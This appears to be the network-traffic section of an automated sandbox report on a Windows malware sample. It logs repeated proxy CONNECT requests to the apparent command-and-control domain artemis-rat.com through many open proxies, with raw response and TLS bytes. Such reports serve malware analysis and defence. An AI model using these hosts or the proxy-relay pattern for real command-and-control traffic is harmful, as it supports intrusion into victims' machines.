                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 55 52 4c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid URL</h2><hr><p>HTTP Error 400. The request URL is invalid.</p></BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1214192.168.2.45390238.54.101.25490007284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.675060034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.854161978 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1215192.168.2.45381245.11.95.16552127284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.675170898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.553730965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.757354021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.868494987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1216192.168.2.453830161.132.48.3280807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.676296949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.365808010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.292155981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.019967079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.366499901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.705756903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1217192.168.2.45381747.243.114.19281807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.680896044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1218192.168.2.451674203.79.29.19811117284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.684241056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.757256031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.877597094 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1219192.168.2.453889157.185.157.151265897284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.691907883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1220192.168.2.45385692.205.110.47171587284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.704829931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.366559982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.366879940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.257237911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1221192.168.2.45378945.120.178.19710807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.713274956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1222192.168.2.453858148.66.130.53319077284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.735203981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.496970892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.554101944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.659992933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.663331032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:34.655709028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:38.663748980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:46.663081884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:02.491197109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1223192.168.2.453967185.100.47.1054437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.738569021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1224192.168.2.453971185.100.47.1054437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.739746094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1225192.168.2.453976185.100.47.1054437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.741081953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1226192.168.2.453979185.100.47.1054437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.742609978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1227192.168.2.453814103.190.54.141807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.746839046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.915277958 CET39INHTTP/1.1 200 Connection established
                                              Mar 11, 2024 08:37:25.916271925 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ee b4 b4 73 6a af ff 1d 90 43 b3 ae 87 f8 52 da fa b4 b4 a6 0c 0b 2c ed 69 ef 9e 70 f9 0d 09 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                              Data Ascii: esjCR,ip*,+0/$#('=<5/Uartemis-rat.com#
                                              Mar 11, 2024 08:37:26.876555920 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ee b4 b6 d9 a0 09 da 50 70 7f f5 67 38 f1 56 f3 a7 7e 26 ba 97 a5 1b 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00
                                              Data Ascii: C?ePpg8V~&DOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
                                              Mar 11, 2024 08:37:26.876853943 CET1286INData Raw: 98 6e 71 f4 11 ac 4d b8 a7 7d 6f da c6 bc f4 b1 9e 56 4d 29 6b 80 18 2b 54 cc 2f af 96 ce 21 d1 4a a2 d6 af dc dc c3 23 73 8a f8 60 aa 82 11 8f 73 e6 dd de ff f1 c4 74 75 19 89 f2 11 f3 81 b3 5c 09 1f 05 21 66 f5 dc f5 01 c2 34 dc e1 8e 2b 77 c7
                                              Data Ascii: nqM}oVM)k+T/!J#s`stu\!f4+wF3yO3RDw.QJRh8?hXZR`UHG3XF%~ t\5|0F<Arp'~00tP'S"0*H0G10UUS
                                              Mar 11, 2024 08:37:26.876902103 CET1286INData Raw: 9f 57 a9 41 6d 5a 90 a7 db 3a ea 75 80 0c 63 0b 69 74 6f 07 4c 15 f3 37 28 a5 19 a4 6e f5 f6 20 cd 63 b2 7e c4 2b 09 75 89 da d1 3c 2e 72 4f 36 1a a1 9e 44 d0 cd 9b a6 23 08 3f 97 a1 a7 9e 5a a5 f7 09 94 ad 5d 76 5d 28 56 d1 1a 66 51 51 07 7b de
                                              Data Ascii: WAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\9+S/tgw7-[peZ%wjNuMjfynm"m,P5}pY*
                                              Mar 11, 2024 08:37:26.876966953 CET736INData Raw: 30 02 86 1d 68 74 74 70 3a 2f 2f 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e 63 72 74 30 32 06 03 55 1d 1f 04 2b 30 29 30 27 a0 25 a0 23 86 21 68 74 74 70 3a 2f 2f 63 72 6c 2e 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e
                                              Data Ascii: 0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y0*H4(v1z!R>tA=5\_|W&o[Fh7okz7%QhIZ
                                              Mar 11, 2024 08:37:26.921452045 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 62 13 f2 93 50 71 1d d6 7b b6 ff ba 38 9d b1 f7 d3 a9 1c 5e 60 78 44 57 0c 87 69 cf 8b 95 ec 71 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 76 d1 54 66 9e eb 49 a6 4c 23 10 66 c5 df b2 e6 a0 7b 2b 33 f4
                                              Data Ascii: %! bPq{8^`xDWiq(vTfIL#f{+3WN
                                              Mar 11, 2024 08:37:27.426639080 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 1f 00 c0 db b6 5d f3 13 54 6f 69 7b 22 7f cc ca 39 f9 56 a1 70 2e 3d 78 7b bf 89 6d bf 40 29 d9 9c 11 dc 28 ac 2f 73 65 d1 46 f8 d4 ec 56 7a 1e e3 06 e7 3a 7d e8 ec 29 c6 48 c4 39 43 06 8b 83 47 19 17 d2 67 44
                                              Data Ascii: ]Toi{"9Vp.=x{m@)(/seFVz:})H9CGgDd"?? `zCh;_$[*|nX*J&vsy0aGP/c6DUASEpwc(}]J`hb0cs!0dr""(Bk:N
                                              Mar 11, 2024 08:37:46.183789015 CET31INData Raw: 15 03 03 00 1a 00 00 00 00 00 00 00 01 e5 e7 ef 38 fc 81 23 07 4a cd 05 1e ae 21 76 88 6d cf
                                              Data Ascii: 8#J!vm


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1228192.168.2.45391338.54.101.25431287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.769726992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.951390982 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1229192.168.2.453861123.110.158.236807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.770975113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1230192.168.2.453815115.127.31.6680807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.778189898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1231192.168.2.45389560.188.102.225180807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.851069927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1232192.168.2.45386443.133.74.172156737284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.852001905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1233192.168.2.453900128.140.26.12807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.852348089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.161020994 CET309INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.25.2
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 157
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.2</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1234192.168.2.453862186.124.164.213807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.852793932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1235192.168.2.453880155.185.15.5631287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.852799892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.291485071 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1236192.168.2.45387251.83.140.7081817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.853611946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.184643984 CET325INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.14.2
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 173
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.2</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1237192.168.2.45252172.210.208.10141457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
